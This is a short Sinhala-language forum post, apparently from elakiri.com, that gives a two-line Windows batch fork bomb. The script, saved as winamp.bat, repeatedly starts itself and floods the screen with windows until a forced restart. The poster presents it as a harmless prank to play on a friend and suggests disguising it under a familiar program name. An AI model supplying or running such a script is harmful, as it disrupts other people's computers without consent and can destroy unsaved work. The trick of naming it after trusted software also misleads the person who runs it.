HI MY FRIENDZ...!!!!!! I'M BACK AGAIN....!!
මම අද දාන දෙවෙනි THREAD එක..පලවෙනි එක බැලුවෙ නැති කට්ටිය මෙතනින් බලන්න..
http://www.elakiri.com/forum/showthread.php?t=814374
හරි කෙලින්ම TRICK එකට බහිමු..මේක පොඩි VIRUS එකක්..VIRUS 1k කිව්වට එහෙම COMPUTER එකට හානි වෙන එකක් නෙමේ..ඒ නිසා බය වෙන්න එපා..යාලුවෙකට පොඩි බයිට් එකක් දෙන්න හොදයි..හැබැයි මේක OPEN කරොත් COMPUTER එක REASTART කරන්නම වෙනවා..ඒ නිසා ඔක්කොම SAVE කරල ඉන්න හොදේ..ෆට්ට ආතල්...

මෙන්න මෙච්චරයි...NOTEPAD එකක COPY කරන්න..
Start winamp.bat
winamp.bat
දැන් winamp.bat කියල SAVE කරන්න..හැබැයි අවසානෙට .bat කියල දන්න අමතක කරන්න එපා..

Winamp කියන තැනට තමන් කැමති නමක් දාගන්න..ඒ වගේම ඒ දාපු නමම SAVE කරද්දිත් දෙන්න. අනිවා .bat සහිතව..OK?
NOW OPEN THE SAVED FILE & LOOK AT HOW COMPUTER GOES CRAZY..& PUT UR FINGER TO THE REASTART BUTTON...
ඔච්චරයි...එක දිගට BOX ගොඩක් එන්න පටන් ගනියි...

ඔයාලට කරදර කරන්න නෙමේ මම මේක ලිව්වෙ.ඔයාලට දැනගන්න විතරයි..අපේ කොල්ලො ඉතින් VIRUS හදන්න ගොඩක් ආසයිනෙ ඒකයි හොදේ..

කැමතිනම් COMMENT & REP++ එකක් දාල යන්න...

Last edited:

patta